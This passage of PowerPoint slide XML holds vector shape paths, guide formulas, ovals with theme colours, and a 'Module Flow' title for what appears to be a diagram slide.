                  <a:pt x="363" y="407"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="399" y="380"/>
                  <a:pt x="434" y="336"/>
                  <a:pt x="443" y="292"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="426" y="301"/>
                  <a:pt x="408" y="301"/>
                  <a:pt x="390" y="301"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="390" y="319"/>
                  <a:pt x="381" y="327"/>
                  <a:pt x="363" y="327"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="292" y="301"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="292" y="301"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="239" y="292"/>
                  <a:pt x="186" y="266"/>
                  <a:pt x="142" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="133" y="239"/>
                  <a:pt x="124" y="248"/>
                  <a:pt x="115" y="248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107" y="248"/>
                  <a:pt x="107" y="248"/>
                  <a:pt x="107" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="283"/>
                  <a:pt x="71" y="327"/>
                  <a:pt x="62" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="398"/>
                  <a:pt x="115" y="425"/>
                  <a:pt x="142" y="434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177" y="380"/>
                  <a:pt x="230" y="327"/>
                  <a:pt x="292" y="301"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="381" y="53"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="381" y="53"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="346" y="62"/>
                  <a:pt x="310" y="70"/>
                  <a:pt x="275" y="79"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="283" y="88"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="283" y="97"/>
                  <a:pt x="275" y="97"/>
                  <a:pt x="275" y="106"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="141"/>
                  <a:pt x="328" y="186"/>
                  <a:pt x="346" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="239"/>
                  <a:pt x="381" y="248"/>
                  <a:pt x="390" y="266"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="417" y="266"/>
                  <a:pt x="434" y="266"/>
                  <a:pt x="452" y="257"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="461" y="248"/>
                  <a:pt x="461" y="230"/>
                  <a:pt x="461" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="461" y="160"/>
                  <a:pt x="426" y="97"/>
                  <a:pt x="381" y="53"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="319" y="327"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="319" y="327"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="257" y="354"/>
                  <a:pt x="213" y="389"/>
                  <a:pt x="177" y="443"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="195" y="451"/>
                  <a:pt x="213" y="451"/>
                  <a:pt x="230" y="451"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="266" y="451"/>
                  <a:pt x="292" y="443"/>
                  <a:pt x="328" y="434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="407"/>
                  <a:pt x="337" y="380"/>
                  <a:pt x="337" y="363"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="337" y="354"/>
                  <a:pt x="337" y="345"/>
                  <a:pt x="328" y="336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="327"/>
                  <a:pt x="319" y="327"/>
                  <a:pt x="319" y="3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lIns="34290" tIns="17145" rIns="34290" bIns="17145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61" name="Freeform 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8C51C5E-80BA-4CCC-B199-B3F34AD063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1927" y="5174993"/>
            <a:ext cx="280924" cy="285280"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 188387 w 462"/>
              <a:gd name="T1" fmla="*/ 156636 h 470"/>
              <a:gd name="T2" fmla="*/ 188387 w 462"/>
              <a:gd name="T3" fmla="*/ 156636 h 470"/>
              <a:gd name="T4" fmla="*/ 188387 w 462"/>
              <a:gd name="T5" fmla="*/ 129203 h 470"/>
              <a:gd name="T6" fmla="*/ 153369 w 462"/>
              <a:gd name="T7" fmla="*/ 93805 h 470"/>
              <a:gd name="T8" fmla="*/ 129876 w 462"/>
              <a:gd name="T9" fmla="*/ 93805 h 470"/>
              <a:gd name="T10" fmla="*/ 113919 w 462"/>
              <a:gd name="T11" fmla="*/ 81858 h 470"/>
              <a:gd name="T12" fmla="*/ 113919 w 462"/>
              <a:gd name="T13" fmla="*/ 50442 h 470"/>
              <a:gd name="T14" fmla="*/ 129876 w 462"/>
              <a:gd name="T15" fmla="*/ 26991 h 470"/>
              <a:gd name="T16" fmla="*/ 102394 w 462"/>
              <a:gd name="T17" fmla="*/ 0 h 470"/>
              <a:gd name="T18" fmla="*/ 74912 w 462"/>
              <a:gd name="T19" fmla="*/ 26991 h 470"/>
              <a:gd name="T20" fmla="*/ 90426 w 462"/>
              <a:gd name="T21" fmla="*/ 50442 h 470"/>
              <a:gd name="T22" fmla="*/ 90426 w 462"/>
              <a:gd name="T23" fmla="*/ 81858 h 470"/>
              <a:gd name="T24" fmla="*/ 74912 w 462"/>
              <a:gd name="T25" fmla="*/ 93805 h 470"/>
              <a:gd name="T26" fmla="*/ 50975 w 462"/>
              <a:gd name="T27" fmla="*/ 93805 h 470"/>
              <a:gd name="T28" fmla="*/ 15958 w 462"/>
              <a:gd name="T29" fmla="*/ 129203 h 470"/>
              <a:gd name="T30" fmla="*/ 15958 w 462"/>
              <a:gd name="T31" fmla="*/ 156636 h 470"/>
              <a:gd name="T32" fmla="*/ 0 w 462"/>
              <a:gd name="T33" fmla="*/ 180087 h 470"/>
              <a:gd name="T34" fmla="*/ 23493 w 462"/>
              <a:gd name="T35" fmla="*/ 207521 h 470"/>
              <a:gd name="T36" fmla="*/ 50975 w 462"/>
              <a:gd name="T37" fmla="*/ 180087 h 470"/>
              <a:gd name="T38" fmla="*/ 35461 w 462"/>
              <a:gd name="T39" fmla="*/ 156636 h 470"/>
              <a:gd name="T40" fmla="*/ 35461 w 462"/>
              <a:gd name="T41" fmla="*/ 129203 h 470"/>
              <a:gd name="T42" fmla="*/ 50975 w 462"/>
              <a:gd name="T43" fmla="*/ 113716 h 470"/>
              <a:gd name="T44" fmla="*/ 74912 w 462"/>
              <a:gd name="T45" fmla="*/ 113716 h 470"/>
              <a:gd name="T46" fmla="*/ 90426 w 462"/>
              <a:gd name="T47" fmla="*/ 109734 h 470"/>
              <a:gd name="T48" fmla="*/ 90426 w 462"/>
              <a:gd name="T49" fmla="*/ 156636 h 470"/>
              <a:gd name="T50" fmla="*/ 74912 w 462"/>
              <a:gd name="T51" fmla="*/ 180087 h 470"/>
              <a:gd name="T52" fmla="*/ 102394 w 462"/>
              <a:gd name="T53" fmla="*/ 207521 h 470"/>
              <a:gd name="T54" fmla="*/ 129876 w 462"/>
              <a:gd name="T55" fmla="*/ 180087 h 470"/>
              <a:gd name="T56" fmla="*/ 113919 w 462"/>
              <a:gd name="T57" fmla="*/ 156636 h 470"/>
              <a:gd name="T58" fmla="*/ 113919 w 462"/>
              <a:gd name="T59" fmla="*/ 109734 h 470"/>
              <a:gd name="T60" fmla="*/ 129876 w 462"/>
              <a:gd name="T61" fmla="*/ 113716 h 470"/>
              <a:gd name="T62" fmla="*/ 153369 w 462"/>
              <a:gd name="T63" fmla="*/ 113716 h 470"/>
              <a:gd name="T64" fmla="*/ 168884 w 462"/>
              <a:gd name="T65" fmla="*/ 129203 h 470"/>
              <a:gd name="T66" fmla="*/ 168884 w 462"/>
              <a:gd name="T67" fmla="*/ 156636 h 470"/>
              <a:gd name="T68" fmla="*/ 153369 w 462"/>
              <a:gd name="T69" fmla="*/ 180087 h 470"/>
              <a:gd name="T70" fmla="*/ 180852 w 462"/>
              <a:gd name="T71" fmla="*/ 207521 h 470"/>
              <a:gd name="T72" fmla="*/ 204345 w 462"/>
              <a:gd name="T73" fmla="*/ 180087 h 470"/>
              <a:gd name="T74" fmla="*/ 188387 w 462"/>
              <a:gd name="T75" fmla="*/ 156636 h 470"/>
              <a:gd name="T76" fmla="*/ 39451 w 462"/>
              <a:gd name="T77" fmla="*/ 180087 h 470"/>
              <a:gd name="T78" fmla="*/ 39451 w 462"/>
              <a:gd name="T79" fmla="*/ 180087 h 470"/>
              <a:gd name="T80" fmla="*/ 23493 w 462"/>
              <a:gd name="T81" fmla="*/ 195574 h 470"/>
              <a:gd name="T82" fmla="*/ 7979 w 462"/>
              <a:gd name="T83" fmla="*/ 180087 h 470"/>
              <a:gd name="T84" fmla="*/ 23493 w 462"/>
              <a:gd name="T85" fmla="*/ 164601 h 470"/>
              <a:gd name="T86" fmla="*/ 39451 w 462"/>
              <a:gd name="T87" fmla="*/ 180087 h 470"/>
              <a:gd name="T88" fmla="*/ 86880 w 462"/>
              <a:gd name="T89" fmla="*/ 26991 h 470"/>
              <a:gd name="T90" fmla="*/ 86880 w 462"/>
              <a:gd name="T91" fmla="*/ 26991 h 470"/>
              <a:gd name="T92" fmla="*/ 102394 w 462"/>
              <a:gd name="T93" fmla="*/ 11504 h 470"/>
              <a:gd name="T94" fmla="*/ 117908 w 462"/>
              <a:gd name="T95" fmla="*/ 26991 h 470"/>
              <a:gd name="T96" fmla="*/ 102394 w 462"/>
              <a:gd name="T97" fmla="*/ 42920 h 470"/>
              <a:gd name="T98" fmla="*/ 86880 w 462"/>
              <a:gd name="T99" fmla="*/ 26991 h 470"/>
              <a:gd name="T100" fmla="*/ 117908 w 462"/>
              <a:gd name="T101" fmla="*/ 180087 h 470"/>
              <a:gd name="T102" fmla="*/ 117908 w 462"/>
              <a:gd name="T103" fmla="*/ 180087 h 470"/>
              <a:gd name="T104" fmla="*/ 102394 w 462"/>
              <a:gd name="T105" fmla="*/ 195574 h 470"/>
              <a:gd name="T106" fmla="*/ 86880 w 462"/>
              <a:gd name="T107" fmla="*/ 180087 h 470"/>
              <a:gd name="T108" fmla="*/ 102394 w 462"/>
              <a:gd name="T109" fmla="*/ 164601 h 470"/>
              <a:gd name="T110" fmla="*/ 117908 w 462"/>
              <a:gd name="T111" fmla="*/ 180087 h 470"/>
              <a:gd name="T112" fmla="*/ 180852 w 462"/>
              <a:gd name="T113" fmla="*/ 195574 h 470"/>
              <a:gd name="T114" fmla="*/ 180852 w 462"/>
              <a:gd name="T115" fmla="*/ 195574 h 470"/>
              <a:gd name="T116" fmla="*/ 164894 w 462"/>
              <a:gd name="T117" fmla="*/ 180087 h 470"/>
              <a:gd name="T118" fmla="*/ 180852 w 462"/>
              <a:gd name="T119" fmla="*/ 164601 h 470"/>
              <a:gd name="T120" fmla="*/ 192377 w 462"/>
              <a:gd name="T121" fmla="*/ 180087 h 470"/>
              <a:gd name="T122" fmla="*/ 180852 w 462"/>
              <a:gd name="T123" fmla="*/ 195574 h 470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62" h="470">
                <a:moveTo>
                  <a:pt x="425" y="354"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="425" y="354"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="425" y="292"/>
                  <a:pt x="425" y="292"/>
                  <a:pt x="425" y="292"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="425" y="257"/>
                  <a:pt x="408" y="212"/>
                  <a:pt x="346" y="212"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="293" y="212"/>
                  <a:pt x="293" y="212"/>
                  <a:pt x="293" y="212"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="257" y="212"/>
                  <a:pt x="257" y="195"/>
                  <a:pt x="257" y="185"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="257" y="114"/>
                  <a:pt x="257" y="114"/>
                  <a:pt x="257" y="114"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="275" y="106"/>
                  <a:pt x="293" y="88"/>
                  <a:pt x="293" y="61"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="293" y="26"/>
                  <a:pt x="266" y="0"/>
                  <a:pt x="231" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="196" y="0"/>
                  <a:pt x="169" y="26"/>
                  <a:pt x="169" y="61"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="169" y="88"/>
                  <a:pt x="186" y="106"/>
                  <a:pt x="204" y="114"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="185"/>
                  <a:pt x="204" y="185"/>
                  <a:pt x="204" y="185"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="185"/>
                  <a:pt x="204" y="212"/>
                  <a:pt x="169" y="212"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="212"/>
                  <a:pt x="115" y="212"/>
                  <a:pt x="115" y="212"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="212"/>
                  <a:pt x="36" y="257"/>
                  <a:pt x="36" y="292"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="36" y="354"/>
                  <a:pt x="36" y="354"/>
                  <a:pt x="36" y="354"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="363"/>
                  <a:pt x="0" y="380"/>
                  <a:pt x="0" y="407"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="442"/>
                  <a:pt x="27" y="469"/>
                  <a:pt x="53" y="469"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="469"/>
                  <a:pt x="115" y="442"/>
                  <a:pt x="115" y="407"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="380"/>
                  <a:pt x="98" y="363"/>
                  <a:pt x="80" y="354"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="292"/>
                  <a:pt x="80" y="292"/>
                  <a:pt x="80" y="292"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="292"/>
                  <a:pt x="80" y="257"/>
                  <a:pt x="115" y="257"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="169" y="257"/>
                  <a:pt x="169" y="257"/>
                  <a:pt x="169" y="257"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="186" y="257"/>
                  <a:pt x="196" y="257"/>
                  <a:pt x="204" y="248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="354"/>
                  <a:pt x="204" y="354"/>
                  <a:pt x="204" y="354"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="186" y="363"/>
                  <a:pt x="169" y="380"/>
                  <a:pt x="169" y="407"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="169" y="442"/>
                  <a:pt x="196" y="469"/>
                  <a:pt x="231" y="469"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="266" y="469"/>
                  <a:pt x="293" y="442"/>
                  <a:pt x="293" y="407"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="293" y="380"/>
                  <a:pt x="275" y="363"/>
                  <a:pt x="257" y="354"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="257" y="248"/>
                  <a:pt x="257" y="248"/>
                  <a:pt x="257" y="248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="266" y="257"/>
                  <a:pt x="275" y="257"/>
                  <a:pt x="293" y="257"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="346" y="257"/>
                  <a:pt x="346" y="257"/>
                  <a:pt x="346" y="257"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="381" y="257"/>
                  <a:pt x="381" y="283"/>
                  <a:pt x="381" y="292"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="381" y="354"/>
                  <a:pt x="381" y="354"/>
                  <a:pt x="381" y="354"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="363"/>
                  <a:pt x="346" y="380"/>
                  <a:pt x="346" y="407"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="346" y="442"/>
                  <a:pt x="372" y="469"/>
                  <a:pt x="408" y="469"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="434" y="469"/>
                  <a:pt x="461" y="442"/>
                  <a:pt x="461" y="407"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="461" y="380"/>
                  <a:pt x="453" y="363"/>
                  <a:pt x="425" y="354"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="89" y="407"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="89" y="407"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="425"/>
                  <a:pt x="71" y="442"/>
                  <a:pt x="53" y="442"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="36" y="442"/>
                  <a:pt x="18" y="425"/>
                  <a:pt x="18" y="407"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18" y="389"/>
                  <a:pt x="36" y="372"/>
                  <a:pt x="53" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="372"/>
                  <a:pt x="89" y="389"/>
                  <a:pt x="89" y="407"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="196" y="61"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="196" y="61"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="196" y="44"/>
                  <a:pt x="213" y="26"/>
                  <a:pt x="231" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="249" y="26"/>
                  <a:pt x="266" y="44"/>
                  <a:pt x="266" y="61"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="266" y="79"/>
                  <a:pt x="249" y="97"/>
                  <a:pt x="231" y="97"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="213" y="97"/>
                  <a:pt x="196" y="79"/>
                  <a:pt x="196" y="61"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="266" y="407"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="266" y="407"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="266" y="425"/>
                  <a:pt x="249" y="442"/>
                  <a:pt x="231" y="442"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="213" y="442"/>
                  <a:pt x="196" y="425"/>
                  <a:pt x="196" y="407"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="196" y="389"/>
                  <a:pt x="213" y="372"/>
                  <a:pt x="231" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="249" y="372"/>
                  <a:pt x="266" y="389"/>
                  <a:pt x="266" y="407"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="408" y="442"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="408" y="442"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="381" y="442"/>
                  <a:pt x="372" y="425"/>
                  <a:pt x="372" y="407"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="372" y="389"/>
                  <a:pt x="381" y="372"/>
                  <a:pt x="408" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="425" y="372"/>
                  <a:pt x="434" y="389"/>
                  <a:pt x="434" y="407"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="434" y="425"/>
                  <a:pt x="425" y="442"/>
                  <a:pt x="408" y="4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lIns="34290" tIns="17145" rIns="34290" bIns="17145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62" name="Freeform 125">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B66B1721-C84F-4F96-BC46-24A97BC911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71051" y="5997959"/>
            <a:ext cx="270035" cy="276568"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 176501 w 445"/>
              <a:gd name="T1" fmla="*/ 0 h 453"/>
              <a:gd name="T2" fmla="*/ 176501 w 445"/>
              <a:gd name="T3" fmla="*/ 0 h 453"/>
              <a:gd name="T4" fmla="*/ 74759 w 445"/>
              <a:gd name="T5" fmla="*/ 0 h 453"/>
              <a:gd name="T6" fmla="*/ 54853 w 445"/>
              <a:gd name="T7" fmla="*/ 23588 h 453"/>
              <a:gd name="T8" fmla="*/ 54853 w 445"/>
              <a:gd name="T9" fmla="*/ 55187 h 453"/>
              <a:gd name="T10" fmla="*/ 74759 w 445"/>
              <a:gd name="T11" fmla="*/ 55187 h 453"/>
              <a:gd name="T12" fmla="*/ 74759 w 445"/>
              <a:gd name="T13" fmla="*/ 23588 h 453"/>
              <a:gd name="T14" fmla="*/ 176501 w 445"/>
              <a:gd name="T15" fmla="*/ 23588 h 453"/>
              <a:gd name="T16" fmla="*/ 176501 w 445"/>
              <a:gd name="T17" fmla="*/ 177579 h 453"/>
              <a:gd name="T18" fmla="*/ 74759 w 445"/>
              <a:gd name="T19" fmla="*/ 177579 h 453"/>
              <a:gd name="T20" fmla="*/ 74759 w 445"/>
              <a:gd name="T21" fmla="*/ 153991 h 453"/>
              <a:gd name="T22" fmla="*/ 54853 w 445"/>
              <a:gd name="T23" fmla="*/ 153991 h 453"/>
              <a:gd name="T24" fmla="*/ 54853 w 445"/>
              <a:gd name="T25" fmla="*/ 177579 h 453"/>
              <a:gd name="T26" fmla="*/ 74759 w 445"/>
              <a:gd name="T27" fmla="*/ 201167 h 453"/>
              <a:gd name="T28" fmla="*/ 176501 w 445"/>
              <a:gd name="T29" fmla="*/ 201167 h 453"/>
              <a:gd name="T30" fmla="*/ 196408 w 445"/>
              <a:gd name="T31" fmla="*/ 177579 h 453"/>
              <a:gd name="T32" fmla="*/ 196408 w 445"/>
              <a:gd name="T33" fmla="*/ 23588 h 453"/>
              <a:gd name="T34" fmla="*/ 176501 w 445"/>
              <a:gd name="T35" fmla="*/ 0 h 453"/>
              <a:gd name="T36" fmla="*/ 98204 w 445"/>
              <a:gd name="T37" fmla="*/ 149985 h 453"/>
              <a:gd name="T38" fmla="*/ 98204 w 445"/>
              <a:gd name="T39" fmla="*/ 149985 h 453"/>
              <a:gd name="T40" fmla="*/ 141113 w 445"/>
              <a:gd name="T41" fmla="*/ 106369 h 453"/>
              <a:gd name="T42" fmla="*/ 98204 w 445"/>
              <a:gd name="T43" fmla="*/ 63198 h 453"/>
              <a:gd name="T44" fmla="*/ 98204 w 445"/>
              <a:gd name="T45" fmla="*/ 90792 h 453"/>
              <a:gd name="T46" fmla="*/ 0 w 445"/>
              <a:gd name="T47" fmla="*/ 90792 h 453"/>
              <a:gd name="T48" fmla="*/ 0 w 445"/>
              <a:gd name="T49" fmla="*/ 122391 h 453"/>
              <a:gd name="T50" fmla="*/ 98204 w 445"/>
              <a:gd name="T51" fmla="*/ 122391 h 453"/>
              <a:gd name="T52" fmla="*/ 98204 w 445"/>
              <a:gd name="T53" fmla="*/ 149985 h 4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445" h="453">
                <a:moveTo>
                  <a:pt x="399" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="399" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="169" y="0"/>
                  <a:pt x="169" y="0"/>
                  <a:pt x="169" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="142" y="0"/>
                  <a:pt x="124" y="27"/>
                  <a:pt x="124" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="124" y="124"/>
                  <a:pt x="124" y="124"/>
                  <a:pt x="124" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="169" y="124"/>
                  <a:pt x="169" y="124"/>
                  <a:pt x="169" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="169" y="53"/>
                  <a:pt x="169" y="53"/>
                  <a:pt x="169" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="399" y="53"/>
                  <a:pt x="399" y="53"/>
                  <a:pt x="399" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="399" y="399"/>
                  <a:pt x="399" y="399"/>
                  <a:pt x="399" y="399"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="169" y="399"/>
                  <a:pt x="169" y="399"/>
                  <a:pt x="169" y="399"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="169" y="346"/>
                  <a:pt x="169" y="346"/>
                  <a:pt x="169" y="346"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="124" y="346"/>
                  <a:pt x="124" y="346"/>
                  <a:pt x="124" y="346"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="124" y="399"/>
                  <a:pt x="124" y="399"/>
                  <a:pt x="124" y="399"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="124" y="425"/>
                  <a:pt x="142" y="452"/>
                  <a:pt x="169" y="452"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="399" y="452"/>
                  <a:pt x="399" y="452"/>
                  <a:pt x="399" y="452"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="425" y="452"/>
                  <a:pt x="444" y="425"/>
                  <a:pt x="444" y="399"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="444" y="53"/>
                  <a:pt x="444" y="53"/>
                  <a:pt x="444" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="444" y="27"/>
                  <a:pt x="425" y="0"/>
                  <a:pt x="399" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="222" y="337"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="222" y="337"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="319" y="239"/>
                  <a:pt x="319" y="239"/>
                  <a:pt x="319" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="222" y="142"/>
                  <a:pt x="222" y="142"/>
                  <a:pt x="222" y="142"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="222" y="204"/>
                  <a:pt x="222" y="204"/>
                  <a:pt x="222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75"/>
                  <a:pt x="0" y="275"/>
                  <a:pt x="0" y="275"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="222" y="275"/>
                  <a:pt x="222" y="275"/>
                  <a:pt x="222" y="275"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="222" y="3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lIns="34290" tIns="17145" rIns="34290" bIns="17145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422269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Rectangle 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{492F9220-FD9E-489E-AF7E-DBE5DD5CF61B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="76199" y="4684091"/>
            <a:ext cx="3581399" cy="99433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>
            <a:scene3d>
              <a:camera prst="perspectiveAbove"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene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4523584" y="221787"/>
            <a:ext cx="3144836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rPr>
              <a:t>Module Flow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1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81" name="Oval 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3632813" y="3354600"/>
            <a:ext cx="551839" cy="551839"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>
          </a:solidFill>
          <a:ln w="38100"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8" name="Oval 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2877160" y="4885888"/>
            <a:ext cx="551839" cy="551839"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="3810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9" name="Oval 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
